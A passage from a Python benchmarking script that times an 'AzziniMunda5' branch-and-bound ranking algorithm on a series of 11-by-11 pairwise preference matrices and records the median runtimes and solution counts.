##############################################################
om = np.array([
[0,21,21,17,26,22,19,35,21,24,26],
[30,0,23,25,24,28,28,37,27,28,29],
[30,28,0,26,22,22,28,26,28,24,22],
[34,26,25,0,26,21,31,33,30,32,28],
[25,27,29,25,0,15,22,30,22,22,18],
[29,23,29,30,36,0,28,40,25,27,32],
[32,23,23,20,29,23,0,27,29,24,20],
[16,14,25,18,21,11,24,0,17,27,17],
[30,24,23,21,29,26,22,34,0,27,24],
[27,23,27,19,29,24,27,24,24,0,24],
[25,22,29,23,33,19,31,34,27,27,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 168, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,19,33,21,27,25,30,36,34,51,32],
[32,0,33,24,47,30,30,41,30,47,28],
[18,18,0,21,27,10,19,27,10,31,19],
[30,27,30,0,40,32,27,32,23,36,40],
[24,4,24,11,0,34,17,20,25,30,23],
[26,21,41,19,17,0,23,26,17,30,32],
[21,21,32,24,34,28,0,30,17,21,23],
[15,10,24,19,31,25,21,0,25,38,14],
[17,21,41,28,26,34,34,26,0,27,36],
[0,4,20,15,21,21,30,13,24,0,19],
[19,23,32,11,28,19,28,37,15,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 169, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,19,30,27,30,26,30,25,27,30],
[24,0,25,28,24,27,26,31,26,33,28],
[32,26,0,24,23,32,30,34,28,25,31],
[21,23,27,0,23,27,26,31,25,26,29],
[24,27,28,28,0,29,25,32,26,30,35],
[21,24,19,24,22,0,24,28,23,28,28],
[25,25,21,25,26,27,0,26,27,28,27],
[21,20,17,20,19,23,25,0,22,26,25],
[26,25,23,26,25,28,24,29,0,25,33],
[24,18,26,25,21,23,23,25,26,0,28],
[21,23,20,22,16,23,24,26,18,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 170, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,24,27,28,34,32,34,31,29,22],
[22,0,24,26,28,28,29,27,30,28,23],
[27,27,0,28,27,32,24,28,37,28,28],
[24,25,23,0,23,31,24,32,27,26,25],
[23,23,24,28,0,26,27,31,27,20,17],
[17,23,19,20,25,0,21,30,27,22,20],
[19,22,27,27,24,30,0,34,30,25,23],
[17,24,23,19,20,21,17,0,24,17,15],
[20,21,14,24,24,24,21,27,0,22,19],
[22,23,23,25,31,29,26,34,29,0,25],
[29,28,23,26,34,31,28,36,32,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 171, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,38,28,22,29,30,30,31,26,30],
[28,0,29,29,23,31,24,29,31,27,34],
[13,22,0,19,11,19,26,15,14,11,24],
[23,22,32,0,23,25,28,23,24,19,26],
[29,28,40,28,0,25,28,33,25,24,32],
[22,20,32,26,26,0,30,31,25,19,31],
[21,27,25,23,23,21,0,22,24,21,22],
[21,22,36,28,18,20,29,0,24,22,23],
[20,20,37,27,26,26,27,27,0,24,28],
[25,24,40,32,27,32,30,29,27,0,36],
[21,17,27,25,19,20,29,28,23,15,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 172, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,35,24,35,35,27,27,51,27,35],
[28,0,51,24,51,23,27,35,39,35,23],
[16,0,0,0,11,0,12,11,24,12,11],
[27,27,51,0,39,31,23,39,39,39,31],
[16,0,40,12,0,4,12,11,28,12,15],
[16,28,51,20,47,0,12,39,51,39,27],
[24,24,39,28,39,39,0,39,39,51,39],
[24,16,40,12,40,12,12,0,28,28,23],
[0,12,27,12,23,0,12,23,0,12,11],
[24,16,39,12,39,12,0,23,39,0,23],
[16,28,40,20,36,24,12,28,40,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 173, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,15,17,24,20,22,14,20,26,23,17],
[36,0,20,29,28,23,25,24,30,30,28],
[34,31,0,34,17,28,27,26,30,33,32],
[27,22,17,0,17,19,19,24,27,21,22],
[31,23,34,34,0,27,23,29,34,30,29],
[29,28,23,32,24,0,19,24,32,24,22],
[37,26,24,32,28,32,0,31,35,32,28],
[31,27,25,27,22,27,20,0,31,19,22],
[25,21,21,24,17,19,16,20,0,21,22],
[28,21,18,30,21,27,19,32,30,0,23],
[34,23,19,29,22,29,23,29,29,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 174, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,17,17,17,17,9,26,11,16,18,20],
[34,0,28,26,20,30,41,24,27,24,32],
[34,23,0,24,25,22,24,20,25,32,23],
[34,25,27,0,24,24,32,21,28,32,30],
[34,31,26,27,0,22,35,21,20,29,29],
[42,21,29,27,29,0,26,27,19,28,30],
[25,10,27,19,16,25,0,22,18,22,26],
[40,27,31,30,30,24,29,0,21,25,30],
[35,24,26,23,31,32,33,30,0,28,29],
[33,27,19,19,22,23,29,26,23,0,25],
[31,19,28,21,22,21,25,21,22,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 175, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,34,33,27,29,32,34,30,31,24,26],
[17,0,22,15,19,23,28,23,23,21,22],
[18,29,0,18,18,20,24,21,24,19,21],
[24,36,33,0,31,30,25,31,28,26,28],
[22,32,33,20,0,28,27,25,27,25,27],
[19,28,31,21,23,0,27,18,25,23,24],
[17,23,27,26,24,24,0,26,20,26,24],
[21,28,30,20,26,33,25,0,26,23,27],
[20,28,27,23,24,26,31,25,0,25,32],
[27,30,32,25,26,28,25,28,26,0,25],
[25,29,30,23,24,27,27,24,19,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 176, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,25,35,22,31,31,33,36,24,29],
[26,0,33,34,28,26,31,18,33,30,32],
[26,18,0,29,22,18,26,18,24,18,21],
[16,17,22,0,28,20,19,14,21,17,19],
[29,23,29,23,0,32,37,21,36,20,27],
[20,25,33,31,19,0,27,16,35,27,21],
[20,20,25,32,14,24,0,12,22,15,17],
[18,33,33,37,30,35,39,0,37,33,27],
[15,18,27,30,15,16,29,14,0,27,21],
[27,21,33,34,31,24,36,18,24,0,27],
[22,19,30,32,24,30,34,24,30,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 177, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,31,29,30,31,28,25,26,27,25],
[24,0,29,29,28,23,28,28,27,29,18],
[20,22,0,22,23,23,21,23,14,19,18],
[22,22,29,0,26,28,26,27,24,26,22],
[21,23,28,25,0,32,26,24,19,23,25],
[20,28,28,23,19,0,25,24,22,22,21],
[23,23,30,25,25,26,0,22,26,25,22],
[26,23,28,24,27,27,29,0,25,23,25],
[25,24,37,27,32,29,25,26,0,30,26],
[24,22,32,25,28,29,26,28,21,0,27],
[26,33,33,29,26,30,29,26,25,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 178, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,19,23,24,27,26,29,30,20,22,26],
[32,0,26,31,36,26,25,29,24,31,26],
[28,25,0,26,27,25,22,24,24,31,27],
[27,20,25,0,22,22,22,26,28,29,24],
[24,15,24,29,0,26,23,28,20,30,20],
[25,25,26,29,25,0,25,27,29,27,28],
[22,26,29,29,28,26,0,30,28,33,28],
[21,22,27,25,23,24,21,0,22,30,24],
[31,27,27,23,31,22,23,29,0,28,24],
[29,20,20,22,21,24,18,21,23,0,21],
[25,25,24,27,31,23,23,27,27,30,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 179, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,33,42,33,34,31,18,20,40,33,39],
[18,0,20,26,32,35,18,26,26,35,24],
[9,31,0,19,29,37,18,26,26,28,17],
[18,25,32,0,23,23,18,29,35,31,20],
[17,19,22,28,0,26,18,15,15,8,17],
[20,16,14,28,25,0,18,26,37,30,28],
[33,33,33,33,33,33,0,20,31,33,39],
[31,25,25,22,36,25,31,0,40,25,31],
[11,25,25,16,36,14,20,11,0,20,31],
[18,16,23,20,43,21,18,26,31,0,29],
[12,27,34,31,34,23,12,20,20,22,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 180, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,16,29,21,33,19,24,33,21,15,18],
[35,0,36,28,44,38,26,37,23,28,26],
[22,15,0,16,21,20,16,21,14,17,14],
[30,23,35,0,30,34,32,30,29,29,25],
[18,7,30,21,0,28,19,30,21,17,24],
[32,13,31,17,23,0,17,22,23,20,17],
[27,25,35,19,32,34,0,30,19,19,18],
[18,14,30,21,21,29,21,0,26,21,19],
[30,28,37,22,30,28,32,25,0,25,24],
[36,23,34,22,34,31,32,30,26,0,20],
[33,25,37,26,27,34,33,32,27,31,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 181, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,17,20,19,23,16,30,28,22,16],
[27,0,20,20,26,27,24,30,25,26,23],
[34,31,0,26,28,31,25,34,36,28,26],
[31,31,25,0,24,22,21,27,31,25,20],
[32,25,23,27,0,30,22,27,32,27,25],
[28,24,20,29,21,0,25,28,27,26,19],
[35,27,26,30,29,26,0,29,28,27,20],
[21,21,17,24,24,23,22,0,27,23,14],
[23,26,15,20,19,24,23,24,0,23,14],
[29,25,23,26,24,25,24,28,28,0,21],
[35,28,25,31,26,32,31,37,37,30,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 182, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,17,11,18,24,12,24,21,18,18],
[27,0,27,14,23,29,22,26,16,22,21],
[34,24,0,19,27,24,22,29,22,22,26],
[40,37,32,0,30,32,26,35,22,33,31],
[33,28,24,21,0,28,27,34,21,24,26],
[27,22,27,19,23,0,16,23,19,20,22],
[39,29,29,25,24,35,0,28,25,25,25],
[27,25,22,16,17,28,23,0,21,22,21],
[30,35,29,29,30,32,26,30,0,29,24],
[33,29,29,18,27,31,26,29,22,0,26],
[33,30,25,20,25,29,26,30,27,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 183, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,26,28,27,25,24,33,22,20,22],
[28,0,28,28,30,28,24,36,28,28,25],
[25,23,0,28,25,20,19,29,22,22,18],
[23,23,23,0,24,25,24,29,21,17,23],
[24,21,26,27,0,24,28,24,25,27,24],
[26,23,31,26,27,0,24,29,24,29,28],
[27,27,32,27,23,27,0,29,24,23,25],
[18,15,22,22,27,22,22,0,21,20,14],
[29,23,29,30,26,27,27,30,0,27,24],
[31,23,29,34,24,22,28,31,24,0,28],
[29,26,33,28,27,23,26,37,27,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 184, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,24,27,22,25,21,27,24,30,31],
[26,0,27,24,23,31,21,24,25,28,32],
[27,24,0,25,26,28,27,24,25,29,31],
[24,27,26,0,28,30,23,29,27,28,31],
[29,28,25,23,0,34,25,27,23,28,29],
[26,20,23,21,17,0,22,26,20,26,25],
[30,30,24,28,26,29,0,25,28,27,30],
[24,27,27,22,24,25,26,0,23,26,29],
[27,26,26,24,28,31,23,28,0,27,27],
[21,23,22,23,23,25,24,25,24,0,25],
[20,19,20,20,22,26,21,22,24,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 185, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,22,25,29,23,26,29,25,17,27],
[22,0,20,20,22,23,20,27,25,18,23],
[29,31,0,26,33,28,24,31,26,18,31],
[26,31,25,0,31,25,24,26,26,22,27],
[22,29,18,20,0,20,22,19,20,21,27],
[28,28,23,26,31,0,29,28,23,22,22],
[25,31,27,27,29,22,0,26,28,25,27],
[22,24,20,25,32,23,25,0,25,26,28],
[26,26,25,25,31,28,23,26,0,24,25],
[34,33,33,29,30,29,26,25,27,0,27],
[24,28,20,24,24,29,24,23,26,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 186, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,28,28,27,26,21,23,19,25,26],
[23,0,24,19,27,20,21,16,18,24,19],
[23,27,0,24,30,19,21,17,24,24,21],
[23,32,27,0,32,22,23,17,25,25,22],
[24,24,21,19,0,20,20,18,19,24,17],
[25,31,32,29,31,0,21,21,21,25,18],
[30,30,30,28,31,30,0,25,24,28,28],
[28,35,34,34,33,30,26,0,25,30,26],
[32,33,27,26,32,30,27,26,0,26,22],
[26,27,27,26,27,26,23,21,25,0,19],
[25,32,30,29,34,33,23,25,29,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 187, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,33,25,32,34,31,28,23,28,31],
[23,0,32,28,27,31,31,25,25,18,29],
[18,19,0,21,28,26,28,31,23,25,24],
[26,23,30,0,29,31,23,35,19,17,30],
[19,24,23,22,0,14,23,18,19,19,19],
[17,20,25,20,37,0,31,32,29,21,27],
[20,20,23,28,28,20,0,24,23,20,25],
[23,26,20,16,33,19,27,0,24,25,25],
[28,26,28,32,32,22,28,27,0,31,32],
[23,33,26,34,32,30,31,26,20,0,28],
[20,22,27,21,32,24,26,26,19,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 188, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,28,23,24,23,29,25,30,26,27],
[28,0,31,31,33,28,23,27,29,24,35],
[23,20,0,17,20,18,18,12,15,21,25],
[28,20,34,0,26,28,26,25,25,29,31],
[27,18,31,25,0,26,29,19,22,24,30],
[28,23,33,23,25,0,29,20,23,20,32],
[22,28,33,25,22,22,0,20,21,27,35],
[26,24,39,26,32,31,31,0,25,27,30],
[21,22,36,26,29,28,30,26,0,26,30],
[25,27,30,22,27,31,24,24,25,0,31],
[24,16,26,20,21,19,16,21,21,20,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 189, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,26,28,31,35,29,24,28,27,26],
[26,0,25,27,31,34,25,28,30,29,28],
[25,26,0,27,30,30,26,33,27,27,28],
[23,24,24,0,33,33,28,29,31,26,30],
[20,20,21,18,0,25,21,22,19,22,20],
[16,17,21,18,26,0,24,25,24,21,19],
[22,26,25,23,30,27,0,24,28,21,25],
[27,23,18,22,29,26,27,0,26,26,26],
[23,21,24,20,32,27,23,25,0,29,18],
[24,22,24,25,29,30,30,25,22,0,25],
[25,23,23,21,31,32,26,25,33,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 190, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,31,30,28,33,27,30,25,30,29],
[24,0,25,26,22,24,26,24,28,28,24],
[20,26,0,26,25,23,24,23,26,26,20],
[21,25,25,0,25,28,25,22,26,27,26],
[23,29,26,26,0,27,25,24,25,28,28],
[18,27,28,23,24,0,27,21,24,26,29],
[24,25,27,26,26,24,0,26,25,28,24],
[21,27,28,29,27,30,25,0,27,30,27],
[26,23,25,25,26,27,26,24,0,27,28],
[21,23,25,24,23,25,23,21,24,0,20],
[22,27,31,25,23,22,27,24,23,31,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 191, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,23,27,25,24,26,25,25,23,23],
[26,0,22,26,25,24,25,31,29,27,24],
[28,29,0,27,24,25,27,29,26,26,24],
[24,25,24,0,21,25,21,26,24,23,24],
[26,26,27,30,0,24,29,25,28,23,29],
[27,27,26,26,27,0,24,30,30,29,28],
[25,26,24,30,22,27,0,28,25,27,22],
[26,20,22,25,26,21,23,0,26,23,22],
[26,22,25,27,23,21,26,25,0,19,24],
[28,24,25,28,28,22,24,28,32,0,26],
[28,27,27,27,22,23,29,29,27,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 192, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,31,29,25,28,38,39,33,32,33,30],
[20,0,26,36,27,33,39,22,24,25,16],
[22,25,0,23,22,33,36,22,32,33,24],
[26,15,28,0,24,33,39,25,22,33,20],
[23,24,29,27,0,30,32,25,20,23,19],
[13,18,18,18,21,0,25,23,18,20,16],
[12,12,15,12,19,26,0,18,17,17,19],
[18,29,29,26,26,28,33,0,28,32,20],
[19,27,19,29,31,33,34,23,0,23,19],
[18,26,18,18,28,31,34,19,28,0,17],
[21,35,27,31,32,35,32,31,32,34,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 193, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,27,26,26,24,28,28,29,29,28],
[24,0,20,22,25,24,25,23,28,30,23],
[24,31,0,28,32,34,31,28,32,31,26],
[25,29,23,0,27,24,30,26,22,29,26],
[25,26,19,24,0,27,29,25,19,28,20],
[27,27,17,27,24,0,28,29,19,30,23],
[23,26,20,21,22,23,0,24,19,24,22],
[23,28,23,25,26,22,27,0,25,22,24],
[22,23,19,29,32,32,32,26,0,34,27],
[22,21,20,22,23,21,27,29,17,0,22],
[23,28,25,25,31,28,29,27,24,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 194, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,20,26,23,22,25,22,31,23,24,29],
[31,0,31,23,29,28,29,27,29,29,25],
[25,20,0,20,23,25,26,25,24,21,26],
[28,28,31,0,29,26,23,31,25,27,24],
[29,22,28,22,0,29,28,31,27,28,26],
[26,23,26,25,22,0,21,25,24,21,22],
[29,22,25,28,23,30,0,28,28,24,26],
[20,24,26,20,20,26,23,0,22,20,27],
[28,22,27,26,24,27,23,29,0,23,23],
[27,22,30,24,23,30,27,31,28,0,31],
[22,26,25,27,25,29,25,24,28,20,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 195, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,31,26,27,33,23,24,28,24,27],
[23,0,28,25,28,25,23,25,27,28,30],
[20,23,0,25,24,25,20,24,22,23,22],
[25,26,26,0,28,28,20,29,27,26,26],
[24,23,27,23,0,27,21,22,27,24,21],
[18,26,26,23,24,0,26,22,20,22,26],
[28,28,31,31,30,25,0,30,28,29,27],
[27,26,27,22,29,29,21,0,24,27,27],
[23,24,29,24,24,31,23,27,0,23,24],
[27,23,28,25,27,29,22,24,28,0,26],
[24,21,29,25,30,25,24,24,27,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 196, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,19,29,27,28,21,23,28,26,25],
[25,0,19,26,22,26,23,25,28,19,25],
[32,32,0,30,34,26,26,25,29,26,29],
[22,25,21,0,26,21,27,23,28,22,19],
[24,29,17,25,0,22,19,22,24,20,22],
[23,25,25,30,29,0,27,24,27,28,31],
[30,28,25,24,32,24,0,24,26,26,24],
[28,26,26,28,29,27,27,0,29,24,31],
[23,23,22,23,27,24,25,22,0,24,22],
[25,32,25,29,31,23,25,27,27,0,28],
[26,26,22,32,29,20,27,20,29,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 197, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,32,19,31,24,25,24,25,26,28,31],
[19,0,17,26,29,29,30,23,16,27,25],
[32,34,0,41,35,28,38,25,24,31,47],
[20,25,10,0,17,22,21,29,19,24,17],
[27,22,16,34,0,22,22,26,19,21,24],
[26,22,23,29,29,0,35,24,20,29,36],
[27,21,13,30,29,16,0,20,18,24,28],
[26,28,26,22,25,27,31,0,23,26,31],
[25,35,27,32,32,31,33,28,0,28,35],
[23,24,20,27,30,22,27,25,23,0,25],
[20,26,4,34,27,15,23,20,16,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 198, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
